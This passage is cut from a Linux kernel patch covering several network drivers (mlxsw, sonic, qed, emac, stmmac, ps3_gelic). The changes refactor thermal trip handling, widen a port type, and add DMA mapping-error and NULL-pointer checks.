+@@ -78,7 +84,8 @@ struct mlxsw_thermal;
+ struct mlxsw_thermal_module {
+ 	struct mlxsw_thermal *parent;
+ 	struct thermal_zone_device *tzdev;
+-	struct mlxsw_thermal_trip trips[MLXSW_THERMAL_NUM_TRIPS];
++	struct thermal_trip trips[MLXSW_THERMAL_NUM_TRIPS];
++	struct mlxsw_cooling_states cooling_states[MLXSW_THERMAL_NUM_TRIPS];
+ 	int module; /* Module or gearbox number */
+ 	u8 slot_index;
+ };
+@@ -98,8 +105,8 @@ struct mlxsw_thermal {
+ 	struct thermal_zone_device *tzdev;
+ 	int polling_delay;
+ 	struct thermal_cooling_device *cdevs[MLXSW_MFCR_PWMS_MAX];
+-	u8 cooling_levels[MLXSW_THERMAL_MAX_STATE + 1];
+-	struct mlxsw_thermal_trip trips[MLXSW_THERMAL_NUM_TRIPS];
++	struct thermal_trip trips[MLXSW_THERMAL_NUM_TRIPS];
++	struct mlxsw_cooling_states cooling_states[MLXSW_THERMAL_NUM_TRIPS];
+ 	struct mlxsw_thermal_area line_cards[];
+ };
+ 
+@@ -136,9 +143,9 @@ static int mlxsw_get_cooling_device_idx(struct mlxsw_thermal *thermal,
+ static void
+ mlxsw_thermal_module_trips_reset(struct mlxsw_thermal_module *tz)
+ {
+-	tz->trips[MLXSW_THERMAL_TEMP_TRIP_NORM].temp = 0;
+-	tz->trips[MLXSW_THERMAL_TEMP_TRIP_HIGH].temp = 0;
+-	tz->trips[MLXSW_THERMAL_TEMP_TRIP_HOT].temp = 0;
++	tz->trips[MLXSW_THERMAL_TEMP_TRIP_NORM].temperature = 0;
++	tz->trips[MLXSW_THERMAL_TEMP_TRIP_HIGH].temperature = 0;
++	tz->trips[MLXSW_THERMAL_TEMP_TRIP_HOT].temperature = 0;
+ }
+ 
+ static int
+@@ -180,12 +187,12 @@ mlxsw_thermal_module_trips_update(struct device *dev, struct mlxsw_core *core,
+ 	 * by subtracting double hysteresis value.
+ 	 */
+ 	if (crit_temp >= MLXSW_THERMAL_MODULE_TEMP_SHIFT)
+-		tz->trips[MLXSW_THERMAL_TEMP_TRIP_NORM].temp = crit_temp -
++		tz->trips[MLXSW_THERMAL_TEMP_TRIP_NORM].temperature = crit_temp -
+ 					MLXSW_THERMAL_MODULE_TEMP_SHIFT;
+ 	else
+-		tz->trips[MLXSW_THERMAL_TEMP_TRIP_NORM].temp = crit_temp;
+-	tz->trips[MLXSW_THERMAL_TEMP_TRIP_HIGH].temp = crit_temp;
+-	tz->trips[MLXSW_THERMAL_TEMP_TRIP_HOT].temp = emerg_temp;
++		tz->trips[MLXSW_THERMAL_TEMP_TRIP_NORM].temperature = crit_temp;
++	tz->trips[MLXSW_THERMAL_TEMP_TRIP_HIGH].temperature = crit_temp;
++	tz->trips[MLXSW_THERMAL_TEMP_TRIP_HOT].temperature = emerg_temp;
+ 
+ 	return 0;
+ }
+@@ -202,11 +209,11 @@ static int mlxsw_thermal_bind(struct thermal_zone_device *tzdev,
+ 		return 0;
+ 
+ 	for (i = 0; i < MLXSW_THERMAL_NUM_TRIPS; i++) {
+-		const struct mlxsw_thermal_trip *trip = &thermal->trips[i];
++		const struct mlxsw_cooling_states *state = &thermal->cooling_states[i];
+ 
+ 		err = thermal_zone_bind_cooling_device(tzdev, i, cdev,
+-						       trip->max_state,
+-						       trip->min_state,
++						       state->max_state,
++						       state->min_state,
+ 						       THERMAL_WEIGHT_DEFAULT);
+ 		if (err < 0) {
+ 			dev_err(dev, "Failed to bind cooling device to trip %d\n", i);
+@@ -260,61 +267,6 @@ static int mlxsw_thermal_get_temp(struct thermal_zone_device *tzdev,
+ 	return 0;
+ }
+ 
+-static int mlxsw_thermal_get_trip_type(struct thermal_zone_device *tzdev,
+-				       int trip,
+-				       enum thermal_trip_type *p_type)
+-{
+-	struct mlxsw_thermal *thermal = tzdev->devdata;
+-
+-	if (trip < 0 || trip >= MLXSW_THERMAL_NUM_TRIPS)
+-		return -EINVAL;
+-
+-	*p_type = thermal->trips[trip].type;
+-	return 0;
+-}
+-
+-static int mlxsw_thermal_get_trip_temp(struct thermal_zone_device *tzdev,
+-				       int trip, int *p_temp)
+-{
+-	struct mlxsw_thermal *thermal = tzdev->devdata;
+-
+-	if (trip < 0 || trip >= MLXSW_THERMAL_NUM_TRIPS)
+-		return -EINVAL;
+-
+-	*p_temp = thermal->trips[trip].temp;
+-	return 0;
+-}
+-
+-static int mlxsw_thermal_set_trip_temp(struct thermal_zone_device *tzdev,
+-				       int trip, int temp)
+-{
+-	struct mlxsw_thermal *thermal = tzdev->devdata;
+-
+-	if (trip < 0 || trip >= MLXSW_THERMAL_NUM_TRIPS)
+-		return -EINVAL;
+-
+-	thermal->trips[trip].temp = temp;
+-	return 0;
+-}
+-
+-static int mlxsw_thermal_get_trip_hyst(struct thermal_zone_device *tzdev,
+-				       int trip, int *p_hyst)
+-{
+-	struct mlxsw_thermal *thermal = tzdev->devdata;
+-
+-	*p_hyst = thermal->trips[trip].hyst;
+-	return 0;
+-}
+-
+-static int mlxsw_thermal_set_trip_hyst(struct thermal_zone_device *tzdev,
+-				       int trip, int hyst)
+-{
+-	struct mlxsw_thermal *thermal = tzdev->devdata;
+-
+-	thermal->trips[trip].hyst = hyst;
+-	return 0;
+-}
+-
+ static struct thermal_zone_params mlxsw_thermal_params = {
+ 	.no_hwmon = true,
+ };
+@@ -323,11 +275,6 @@ static struct thermal_zone_device_ops mlxsw_thermal_ops = {
+ 	.bind = mlxsw_thermal_bind,
+ 	.unbind = mlxsw_thermal_unbind,
+ 	.get_temp = mlxsw_thermal_get_temp,
+-	.get_trip_type	= mlxsw_thermal_get_trip_type,
+-	.get_trip_temp	= mlxsw_thermal_get_trip_temp,
+-	.set_trip_temp	= mlxsw_thermal_set_trip_temp,
+-	.get_trip_hyst	= mlxsw_thermal_get_trip_hyst,
+-	.set_trip_hyst	= mlxsw_thermal_set_trip_hyst,
+ };
+ 
+ static int mlxsw_thermal_module_bind(struct thermal_zone_device *tzdev,
+@@ -342,11 +289,11 @@ static int mlxsw_thermal_module_bind(struct thermal_zone_device *tzdev,
+ 		return 0;
+ 
+ 	for (i = 0; i < MLXSW_THERMAL_NUM_TRIPS; i++) {
+-		const struct mlxsw_thermal_trip *trip = &tz->trips[i];
++		const struct mlxsw_cooling_states *state = &tz->cooling_states[i];
+ 
+ 		err = thermal_zone_bind_cooling_device(tzdev, i, cdev,
+-						       trip->max_state,
+-						       trip->min_state,
++						       state->max_state,
++						       state->min_state,
+ 						       THERMAL_WEIGHT_DEFAULT);
+ 		if (err < 0)
+ 			goto err_thermal_zone_bind_cooling_device;
+@@ -434,74 +381,10 @@ static int mlxsw_thermal_module_temp_get(struct thermal_zone_device *tzdev,
+ 	return 0;
+ }
+ 
+-static int
+-mlxsw_thermal_module_trip_type_get(struct thermal_zone_device *tzdev, int trip,
+-				   enum thermal_trip_type *p_type)
+-{
+-	struct mlxsw_thermal_module *tz = tzdev->devdata;
+-
+-	if (trip < 0 || trip >= MLXSW_THERMAL_NUM_TRIPS)
+-		return -EINVAL;
+-
+-	*p_type = tz->trips[trip].type;
+-	return 0;
+-}
+-
+-static int
+-mlxsw_thermal_module_trip_temp_get(struct thermal_zone_device *tzdev,
+-				   int trip, int *p_temp)
+-{
+-	struct mlxsw_thermal_module *tz = tzdev->devdata;
+-
+-	if (trip < 0 || trip >= MLXSW_THERMAL_NUM_TRIPS)
+-		return -EINVAL;
+-
+-	*p_temp = tz->trips[trip].temp;
+-	return 0;
+-}
+-
+-static int
+-mlxsw_thermal_module_trip_temp_set(struct thermal_zone_device *tzdev,
+-				   int trip, int temp)
+-{
+-	struct mlxsw_thermal_module *tz = tzdev->devdata;
+-
+-	if (trip < 0 || trip >= MLXSW_THERMAL_NUM_TRIPS)
+-		return -EINVAL;
+-
+-	tz->trips[trip].temp = temp;
+-	return 0;
+-}
+-
+-static int
+-mlxsw_thermal_module_trip_hyst_get(struct thermal_zone_device *tzdev, int trip,
+-				   int *p_hyst)
+-{
+-	struct mlxsw_thermal_module *tz = tzdev->devdata;
+-
+-	*p_hyst = tz->trips[trip].hyst;
+-	return 0;
+-}
+-
+-static int
+-mlxsw_thermal_module_trip_hyst_set(struct thermal_zone_device *tzdev, int trip,
+-				   int hyst)
+-{
+-	struct mlxsw_thermal_module *tz = tzdev->devdata;
+-
+-	tz->trips[trip].hyst = hyst;
+-	return 0;
+-}
+-
+ static struct thermal_zone_device_ops mlxsw_thermal_module_ops = {
+ 	.bind		= mlxsw_thermal_module_bind,
+ 	.unbind		= mlxsw_thermal_module_unbind,
+ 	.get_temp	= mlxsw_thermal_module_temp_get,
+-	.get_trip_type	= mlxsw_thermal_module_trip_type_get,
+-	.get_trip_temp	= mlxsw_thermal_module_trip_temp_get,
+-	.set_trip_temp	= mlxsw_thermal_module_trip_temp_set,
+-	.get_trip_hyst	= mlxsw_thermal_module_trip_hyst_get,
+-	.set_trip_hyst	= mlxsw_thermal_module_trip_hyst_set,
+ };
+ 
+ static int mlxsw_thermal_gearbox_temp_get(struct thermal_zone_device *tzdev,
+@@ -531,11 +414,6 @@ static struct thermal_zone_device_ops mlxsw_thermal_gearbox_ops = {
+ 	.bind		= mlxsw_thermal_module_bind,
+ 	.unbind		= mlxsw_thermal_module_unbind,
+ 	.get_temp	= mlxsw_thermal_gearbox_temp_get,
+-	.get_trip_type	= mlxsw_thermal_module_trip_type_get,
+-	.get_trip_temp	= mlxsw_thermal_module_trip_temp_get,
+-	.set_trip_temp	= mlxsw_thermal_module_trip_temp_set,
+-	.get_trip_hyst	= mlxsw_thermal_module_trip_hyst_get,
+-	.set_trip_hyst	= mlxsw_thermal_module_trip_hyst_set,
+ };
+ 
+ static int mlxsw_thermal_get_max_state(struct thermal_cooling_device *cdev,
+@@ -589,7 +467,7 @@ static int mlxsw_thermal_set_cur_state(struct thermal_cooling_device *cdev,
+ 		return idx;
+ 
+ 	/* Normalize the state to the valid speed range. */
+-	state = thermal->cooling_levels[state];
++	state = max_t(unsigned long, MLXSW_THERMAL_MIN_STATE, state);
+ 	mlxsw_reg_mfsc_pack(mfsc_pl, idx, mlxsw_state_to_duty(state));
+ 	err = mlxsw_reg_write(thermal->core, MLXSW_REG(mfsc), mfsc_pl);
+ 	if (err) {
+@@ -617,7 +495,8 @@ mlxsw_thermal_module_tz_init(struct mlxsw_thermal_module *module_tz)
+ 	else
+ 		snprintf(tz_name, sizeof(tz_name), "mlxsw-module%d",
+ 			 module_tz->module + 1);
+-	module_tz->tzdev = thermal_zone_device_register(tz_name,
++	module_tz->tzdev = thermal_zone_device_register_with_trips(tz_name,
++							module_tz->trips,
+ 							MLXSW_THERMAL_NUM_TRIPS,
+ 							MLXSW_THERMAL_TRIP_MASK,
+ 							module_tz,
+@@ -661,6 +540,8 @@ mlxsw_thermal_module_init(struct device *dev, struct mlxsw_core *core,
+ 	module_tz->parent = thermal;
+ 	memcpy(module_tz->trips, default_thermal_trips,
+ 	       sizeof(thermal->trips));
++	memcpy(module_tz->cooling_states, default_cooling_states,
++	       sizeof(thermal->cooling_states));
+ 	/* Initialize all trip point. */
+ 	mlxsw_thermal_module_trips_reset(module_tz);
+ 	/* Read module temperature and thresholds. */
+@@ -756,7 +637,8 @@ mlxsw_thermal_gearbox_tz_init(struct mlxsw_thermal_module *gearbox_tz)
+ 	else
+ 		snprintf(tz_name, sizeof(tz_name), "mlxsw-gearbox%d",
+ 			 gearbox_tz->module + 1);
+-	gearbox_tz->tzdev = thermal_zone_device_register(tz_name,
++	gearbox_tz->tzdev = thermal_zone_device_register_with_trips(tz_name,
++						gearbox_tz->trips,
+ 						MLXSW_THERMAL_NUM_TRIPS,
+ 						MLXSW_THERMAL_TRIP_MASK,
+ 						gearbox_tz,
+@@ -813,6 +695,8 @@ mlxsw_thermal_gearboxes_init(struct device *dev, struct mlxsw_core *core,
+ 		gearbox_tz = &area->tz_gearbox_arr[i];
+ 		memcpy(gearbox_tz->trips, default_thermal_trips,
+ 		       sizeof(thermal->trips));
++		memcpy(gearbox_tz->cooling_states, default_cooling_states,
++		       sizeof(thermal->cooling_states));
+ 		gearbox_tz->module = i;
+ 		gearbox_tz->parent = thermal;
+ 		gearbox_tz->slot_index = area->slot_index;
+@@ -928,6 +812,7 @@ int mlxsw_thermal_init(struct mlxsw_core *core,
+ 	thermal->core = core;
+ 	thermal->bus_info = bus_info;
+ 	memcpy(thermal->trips, default_thermal_trips, sizeof(thermal->trips));
++	memcpy(thermal->cooling_states, default_cooling_states, sizeof(thermal->cooling_states));
+ 	thermal->line_cards[0].slot_index = 0;
+ 
+ 	err = mlxsw_reg_query(thermal->core, MLXSW_REG(mfcr), mfcr_pl);
+@@ -973,15 +858,12 @@ int mlxsw_thermal_init(struct mlxsw_core *core,
+ 		}
+ 	}
+ 
+-	/* Initialize cooling levels per PWM state. */
+-	for (i = 0; i < MLXSW_THERMAL_MAX_STATE; i++)
+-		thermal->cooling_levels[i] = max(MLXSW_THERMAL_MIN_STATE, i);
+-
+ 	thermal->polling_delay = bus_info->low_frequency ?
+ 				 MLXSW_THERMAL_SLOW_POLL_INT :
+ 				 MLXSW_THERMAL_POLL_INT;
+ 
+-	thermal->tzdev = thermal_zone_device_register("mlxsw",
++	thermal->tzdev = thermal_zone_device_register_with_trips("mlxsw",
++						      thermal->trips,
+ 						      MLXSW_THERMAL_NUM_TRIPS,
+ 						      MLXSW_THERMAL_TRIP_MASK,
+ 						      thermal,
+diff --git a/drivers/net/ethernet/mellanox/mlxsw/spectrum_fid.c b/drivers/net/ethernet/mellanox/mlxsw/spectrum_fid.c
+index 045a24cacfa51..b6ee2d658b0c4 100644
+--- a/drivers/net/ethernet/mellanox/mlxsw/spectrum_fid.c
++++ b/drivers/net/ethernet/mellanox/mlxsw/spectrum_fid.c
+@@ -1354,7 +1354,7 @@ static int mlxsw_sp_fid_8021q_port_vid_map(struct mlxsw_sp_fid *fid,
+ 					   u16 vid)
+ {
+ 	struct mlxsw_sp *mlxsw_sp = mlxsw_sp_port->mlxsw_sp;
+-	u8 local_port = mlxsw_sp_port->local_port;
++	u16 local_port = mlxsw_sp_port->local_port;
+ 	int err;
+ 
+ 	/* In case there are no {Port, VID} => FID mappings on the port,
+@@ -1391,7 +1391,7 @@ mlxsw_sp_fid_8021q_port_vid_unmap(struct mlxsw_sp_fid *fid,
+ 				  struct mlxsw_sp_port *mlxsw_sp_port, u16 vid)
+ {
+ 	struct mlxsw_sp *mlxsw_sp = mlxsw_sp_port->mlxsw_sp;
+-	u8 local_port = mlxsw_sp_port->local_port;
++	u16 local_port = mlxsw_sp_port->local_port;
+ 
+ 	mlxsw_sp_fid_port_vid_list_del(fid, mlxsw_sp_port->local_port, vid);
+ 	mlxsw_sp_fid_evid_map(fid, local_port, vid, false);
+diff --git a/drivers/net/ethernet/natsemi/sonic.c b/drivers/net/ethernet/natsemi/sonic.c
+index d17d1b4f2585f..825356ee3492e 100644
+--- a/drivers/net/ethernet/natsemi/sonic.c
++++ b/drivers/net/ethernet/natsemi/sonic.c
+@@ -292,7 +292,7 @@ static int sonic_send_packet(struct sk_buff *skb, struct net_device *dev)
+ 	 */
+ 
+ 	laddr = dma_map_single(lp->device, skb->data, length, DMA_TO_DEVICE);
+-	if (!laddr) {
++	if (dma_mapping_error(lp->device, laddr)) {
+ 		pr_err_ratelimited("%s: failed to map tx DMA buffer.\n", dev->name);
+ 		dev_kfree_skb_any(skb);
+ 		return NETDEV_TX_OK;
+@@ -509,7 +509,7 @@ static bool sonic_alloc_rb(struct net_device *dev, struct sonic_local *lp,
+ 
+ 	*new_addr = dma_map_single(lp->device, skb_put(*new_skb, SONIC_RBSIZE),
+ 				   SONIC_RBSIZE, DMA_FROM_DEVICE);
+-	if (!*new_addr) {
++	if (dma_mapping_error(lp->device, *new_addr)) {
+ 		dev_kfree_skb(*new_skb);
+ 		*new_skb = NULL;
+ 		return false;
+diff --git a/drivers/net/ethernet/qlogic/qed/qed_sriov.c b/drivers/net/ethernet/qlogic/qed/qed_sriov.c
+index 0848b5529d48a..911509c2b17d5 100644
+--- a/drivers/net/ethernet/qlogic/qed/qed_sriov.c
++++ b/drivers/net/ethernet/qlogic/qed/qed_sriov.c
+@@ -4404,6 +4404,9 @@ qed_iov_configure_min_tx_rate(struct qed_dev *cdev, int vfid, u32 rate)
+ 	}
+ 
+ 	vf = qed_iov_get_vf_info(QED_LEADING_HWFN(cdev), (u16)vfid, true);
++	if (!vf)
++		return -EINVAL;
++
+ 	vport_id = vf->vport_id;
+ 
+ 	return qed_configure_vport_wfq(cdev, vport_id, rate);
+@@ -5152,7 +5155,7 @@ static void qed_iov_handle_trust_change(struct qed_hwfn *hwfn)
+ 
+ 		/* Validate that the VF has a configured vport */
+ 		vf = qed_iov_get_vf_info(hwfn, i, true);
+-		if (!vf->vport_instance)
++		if (!vf || !vf->vport_instance)
+ 			continue;
+ 
+ 		memset(&params, 0, sizeof(params));
+diff --git a/drivers/net/ethernet/qualcomm/emac/emac.c b/drivers/net/ethernet/qualcomm/emac/emac.c
+index 3115b2c128980..eaa50050aa0b7 100644
+--- a/drivers/net/ethernet/qualcomm/emac/emac.c
++++ b/drivers/net/ethernet/qualcomm/emac/emac.c
+@@ -724,9 +724,15 @@ static int emac_remove(struct platform_device *pdev)
+ 	struct net_device *netdev = dev_get_drvdata(&pdev->dev);
+ 	struct emac_adapter *adpt = netdev_priv(netdev);
+ 
++	netif_carrier_off(netdev);
++	netif_tx_disable(netdev);
++
+ 	unregister_netdev(netdev);
+ 	netif_napi_del(&adpt->rx_q.napi);
+ 
++	free_irq(adpt->irq.irq, &adpt->irq);
++	cancel_work_sync(&adpt->work_thread);
++
+ 	emac_clks_teardown(adpt);
+ 
+ 	put_device(&adpt->phydev->mdio.dev);
+diff --git a/drivers/net/ethernet/stmicro/stmmac/common.h b/drivers/net/ethernet/stmicro/stmmac/common.h
+index 6b5d96bced475..ec9c130276d89 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/common.h
++++ b/drivers/net/ethernet/stmicro/stmmac/common.h
+@@ -418,6 +418,7 @@ struct dma_features {
+ 	unsigned int frpbs;
+ 	unsigned int frpes;
+ 	unsigned int addr64;
++	unsigned int host_dma_width;
+ 	unsigned int rssen;
+ 	unsigned int vlhash;
+ 	unsigned int sphen;
+diff --git a/drivers/net/ethernet/stmicro/stmmac/dwmac-imx.c b/drivers/net/ethernet/stmicro/stmmac/dwmac-imx.c
+index bd52fb7cf4860..0d6a84199fd8a 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/dwmac-imx.c
++++ b/drivers/net/ethernet/stmicro/stmmac/dwmac-imx.c
+@@ -251,7 +251,7 @@ static int imx_dwmac_probe(struct platform_device *pdev)
+ 		goto err_parse_dt;
+ 	}
+ 
+-	plat_dat->addr64 = dwmac->ops->addr_width;
++	plat_dat->host_dma_width = dwmac->ops->addr_width;
+ 	plat_dat->init = imx_dwmac_init;
+ 	plat_dat->exit = imx_dwmac_exit;
+ 	plat_dat->clks_config = imx_dwmac_clks_config;
+diff --git a/drivers/net/ethernet/stmicro/stmmac/dwmac-intel.c b/drivers/net/ethernet/stmicro/stmmac/dwmac-intel.c
+index 7deb1f817dacc..13aa919633b47 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/dwmac-intel.c
++++ b/drivers/net/ethernet/stmicro/stmmac/dwmac-intel.c
+@@ -684,7 +684,7 @@ static int ehl_pse0_common_data(struct pci_dev *pdev,
+ 
+ 	intel_priv->is_pse = true;
+ 	plat->bus_id = 2;
+-	plat->addr64 = 32;
++	plat->host_dma_width = 32;
+ 
+ 	plat->clk_ptp_rate = 200000000;
+ 
+@@ -725,7 +725,7 @@ static int ehl_pse1_common_data(struct pci_dev *pdev,
+ 
+ 	intel_priv->is_pse = true;
+ 	plat->bus_id = 3;
+-	plat->addr64 = 32;
++	plat->host_dma_width = 32;
+ 
+ 	plat->clk_ptp_rate = 200000000;
+ 
+diff --git a/drivers/net/ethernet/stmicro/stmmac/dwmac-mediatek.c b/drivers/net/ethernet/stmicro/stmmac/dwmac-mediatek.c
+index 2f7d8e4561d92..9ae31e3dc8218 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/dwmac-mediatek.c
++++ b/drivers/net/ethernet/stmicro/stmmac/dwmac-mediatek.c
+@@ -591,7 +591,7 @@ static int mediatek_dwmac_common_data(struct platform_device *pdev,
+ 	plat->use_phy_wol = priv_plat->mac_wol ? 0 : 1;
+ 	plat->riwt_off = 1;
+ 	plat->maxmtu = ETH_DATA_LEN;
+-	plat->addr64 = priv_plat->variant->dma_bit_mask;
++	plat->host_dma_width = priv_plat->variant->dma_bit_mask;
+ 	plat->bsp_priv = priv_plat;
+ 	plat->init = mediatek_dwmac_init;
+ 	plat->clks_config = mediatek_dwmac_clks_config;
+diff --git a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+index 3c1d4b27668fe..93321437f0933 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
++++ b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+@@ -1429,7 +1429,7 @@ static int stmmac_init_rx_buffers(struct stmmac_priv *priv,
+ 	struct stmmac_rx_buffer *buf = &rx_q->buf_pool[i];
+ 	gfp_t gfp = (GFP_ATOMIC | __GFP_NOWARN);
+ 
+-	if (priv->dma_cap.addr64 <= 32)
++	if (priv->dma_cap.host_dma_width <= 32)
+ 		gfp |= GFP_DMA32;
+ 
+ 	if (!buf->page) {
+@@ -4585,7 +4585,7 @@ static inline void stmmac_rx_refill(struct stmmac_priv *priv, u32 queue)
+ 	unsigned int entry = rx_q->dirty_rx;
+ 	gfp_t gfp = (GFP_ATOMIC | __GFP_NOWARN);
+ 
+-	if (priv->dma_cap.addr64 <= 32)
++	if (priv->dma_cap.host_dma_width <= 32)
+ 		gfp |= GFP_DMA32;
+ 
+ 	while (dirty-- > 0) {
+@@ -6201,7 +6201,7 @@ static int stmmac_dma_cap_show(struct seq_file *seq, void *v)
+ 	seq_printf(seq, "\tFlexible RX Parser: %s\n",
+ 		   priv->dma_cap.frpsel ? "Y" : "N");
+ 	seq_printf(seq, "\tEnhanced Addressing: %d\n",
+-		   priv->dma_cap.addr64);
++		   priv->dma_cap.host_dma_width);
+ 	seq_printf(seq, "\tReceive Side Scaling: %s\n",
+ 		   priv->dma_cap.rssen ? "Y" : "N");
+ 	seq_printf(seq, "\tVLAN Hash Filtering: %s\n",
+@@ -7171,20 +7171,22 @@ int stmmac_dvr_probe(struct device *device,
+ 		dev_info(priv->device, "SPH feature enabled\n");
+ 	}
+ 
+-	/* The current IP register MAC_HW_Feature1[ADDR64] only define
+-	 * 32/40/64 bit width, but some SOC support others like i.MX8MP
+-	 * support 34 bits but it map to 40 bits width in MAC_HW_Feature1[ADDR64].
+-	 * So overwrite dma_cap.addr64 according to HW real design.
++	/* Ideally our host DMA address width is the same as for the
++	 * device. However, it may differ and then we have to use our
++	 * host DMA width for allocation and the device DMA width for
++	 * register handling.
+ 	 */
+-	if (priv->plat->addr64)
+-		priv->dma_cap.addr64 = priv->plat->addr64;
++	if (priv->plat->host_dma_width)
++		priv->dma_cap.host_dma_width = priv->plat->host_dma_width;
++	else
++		priv->dma_cap.host_dma_width = priv->dma_cap.addr64;
+ 
+-	if (priv->dma_cap.addr64) {
++	if (priv->dma_cap.host_dma_width) {
+ 		ret = dma_set_mask_and_coherent(device,
+-				DMA_BIT_MASK(priv->dma_cap.addr64));
++				DMA_BIT_MASK(priv->dma_cap.host_dma_width));
+ 		if (!ret) {
+-			dev_info(priv->device, "Using %d bits DMA width\n",
+-				 priv->dma_cap.addr64);
++			dev_info(priv->device, "Using %d/%d bits DMA host/device width\n",
++				 priv->dma_cap.host_dma_width, priv->dma_cap.addr64);
+ 
+ 			/*
+ 			 * If more than 32 bits can be addressed, make sure to
+@@ -7199,7 +7201,7 @@ int stmmac_dvr_probe(struct device *device,
+ 				goto error_hw_init;
+ 			}
+ 
+-			priv->dma_cap.addr64 = 32;
++			priv->dma_cap.host_dma_width = 32;
+ 		}
+ 	}
+ 
+diff --git a/drivers/net/ethernet/toshiba/ps3_gelic_net.c b/drivers/net/ethernet/toshiba/ps3_gelic_net.c
+index cf8de8a7a8a1e..9d535ae596266 100644
+--- a/drivers/net/ethernet/toshiba/ps3_gelic_net.c
++++ b/drivers/net/ethernet/toshiba/ps3_gelic_net.c
+@@ -317,15 +317,17 @@ static int gelic_card_init_chain(struct gelic_card *card,
+ 
+ 	/* set up the hardware pointers in each descriptor */
+ 	for (i = 0; i < no; i++, descr++) {
++		dma_addr_t cpu_addr;
++
+ 		gelic_descr_set_status(descr, GELIC_DESCR_DMA_NOT_IN_USE);
+-		descr->bus_addr =
+-			dma_map_single(ctodev(card), descr,
+-				       GELIC_DESCR_SIZE,
+-				       DMA_BIDIRECTIONAL);
+ 
+-		if (!descr->bus_addr)
++		cpu_addr = dma_map_single(ctodev(card), descr,
++					  GELIC_DESCR_SIZE, DMA_BIDIRECTIONAL);
++
++		if (dma_mapping_error(ctodev(card), cpu_addr))
+ 			goto iommu_error;
+ 
++		descr->bus_addr = cpu_to_be32(cpu_addr);
+ 		descr->next = descr + 1;
+ 		descr->prev = descr - 1;
+ 	}
+@@ -365,26 +367,28 @@ iommu_error:
+  *
+  * allocates a new rx skb, iommu-maps it and attaches it to the descriptor.
+  * Activate the descriptor state-wise
++ *
++ * Gelic RX sk_buffs must be aligned to GELIC_NET_RXBUF_ALIGN and the length
++ * must be a multiple of GELIC_NET_RXBUF_ALIGN.
+  */
+ static int gelic_descr_prepare_rx(struct gelic_card *card,
+ 				  struct gelic_descr *descr)
+ {
++	static const unsigned int rx_skb_size =
++		ALIGN(GELIC_NET_MAX_FRAME, GELIC_NET_RXBUF_ALIGN) +
++		GELIC_NET_RXBUF_ALIGN - 1;
++	dma_addr_t cpu_addr;
+ 	int offset;
+-	unsigned int bufsize;
+ 
+ 	if (gelic_descr_get_status(descr) !=  GELIC_DESCR_DMA_NOT_IN_USE)
+ 		dev_info(ctodev(card), "%s: ERROR status\n", __func__);
+-	/* we need to round up the buffer size to a multiple of 128 */
+-	bufsize = ALIGN(GELIC_NET_MAX_MTU, GELIC_NET_RXBUF_ALIGN);
+ 
+-	/* and we need to have it 128 byte aligned, therefore we allocate a
+-	 * bit more */
+-	descr->skb = dev_alloc_skb(bufsize + GELIC_NET_RXBUF_ALIGN - 1);
++	descr->skb = netdev_alloc_skb(*card->netdev, rx_skb_size);
+ 	if (!descr->skb) {
+ 		descr->buf_addr = 0; /* tell DMAC don't touch memory */
+ 		return -ENOMEM;
+ 	}
+-	descr->buf_size = cpu_to_be32(bufsize);
++	descr->buf_size = cpu_to_be32(rx_skb_size);
+ 	descr->dmac_cmd_status = 0;
+ 	descr->result_size = 0;
+ 	descr->valid_size = 0;
+@@ -395,11 +399,10 @@ static int gelic_descr_prepare_rx(struct gelic_card *card,
+ 	if (offset)
+ 		skb_reserve(descr->skb, GELIC_NET_RXBUF_ALIGN - offset);
+ 	/* io-mmu-map the skb */
+-	descr->buf_addr = cpu_to_be32(dma_map_single(ctodev(card),
+-						     descr->skb->data,
+-						     GELIC_NET_MAX_MTU,
+-						     DMA_FROM_DEVICE));
+-	if (!descr->buf_addr) {
++	cpu_addr = dma_map_single(ctodev(card), descr->skb->data,
++				  GELIC_NET_MAX_FRAME, DMA_FROM_DEVICE);
++	descr->buf_addr = cpu_to_be32(cpu_addr);
++	if (dma_mapping_error(ctodev(card), cpu_addr)) {
+ 		dev_kfree_skb_any(descr->skb);
+ 		descr->skb = NULL;
+ 		dev_info(ctodev(card),
+@@ -779,7 +782,7 @@ static int gelic_descr_prepare_tx(struct gelic_card *card,
+ 
+ 	buf = dma_map_single(ctodev(card), skb->data, skb->len, DMA_TO_DEVICE);
+ 
+-	if (!buf) {
++	if (dma_mapping_error(ctodev(card), buf)) {
+ 		dev_err(ctodev(card),
+ 			"dma map 2 failed (%p, %i). Dropping packet\n",
+ 			skb->data, skb->len);
+@@ -915,7 +918,7 @@ static void gelic_net_pass_skb_up(struct gelic_descr *descr,
+ 	data_error = be32_to_cpu(descr->data_error);
+ 	/* unmap skb buffer */
+ 	dma_unmap_single(ctodev(card), be32_to_cpu(descr->buf_addr),
+-			 GELIC_NET_MAX_MTU,
++			 GELIC_NET_MAX_FRAME,
+ 			 DMA_FROM_DEVICE);
+ 
+ 	skb_put(skb, be32_to_cpu(descr->valid_size)?
+diff --git a/drivers/net/ethernet/toshiba/ps3_gelic_net.h b/drivers/net/ethernet/toshiba/ps3_gelic_net.h
+index 68f324ed4eaf0..0d98defb011ed 100644
+--- a/drivers/net/ethernet/toshiba/ps3_gelic_net.h
++++ b/drivers/net/ethernet/toshiba/ps3_gelic_net.h
+@@ -19,8 +19,9 @@
+ #define GELIC_NET_RX_DESCRIPTORS        128 /* num of descriptors */
+ #define GELIC_NET_TX_DESCRIPTORS        128 /* num of descriptors */
+ 
+-#define GELIC_NET_MAX_MTU               VLAN_ETH_FRAME_LEN
+-#define GELIC_NET_MIN_MTU               VLAN_ETH_ZLEN
++#define GELIC_NET_MAX_FRAME             2312
++#define GELIC_NET_MAX_MTU               2294
++#define GELIC_NET_MIN_MTU               64
+ #define GELIC_NET_RXBUF_ALIGN           128
+ #define GELIC_CARD_RX_CSUM_DEFAULT      1 /* hw chksum */
+ #define GELIC_NET_WATCHDOG_TIMEOUT      5*HZ
+diff --git a/drivers/net/ethernet/xircom/xirc2ps_cs.c b/drivers/net/ethernet/xircom/xirc2ps_cs.c
+index 894e92ef415b9..9f505cf02d965 100644
+--- a/drivers/net/ethernet/xircom/xirc2ps_cs.c
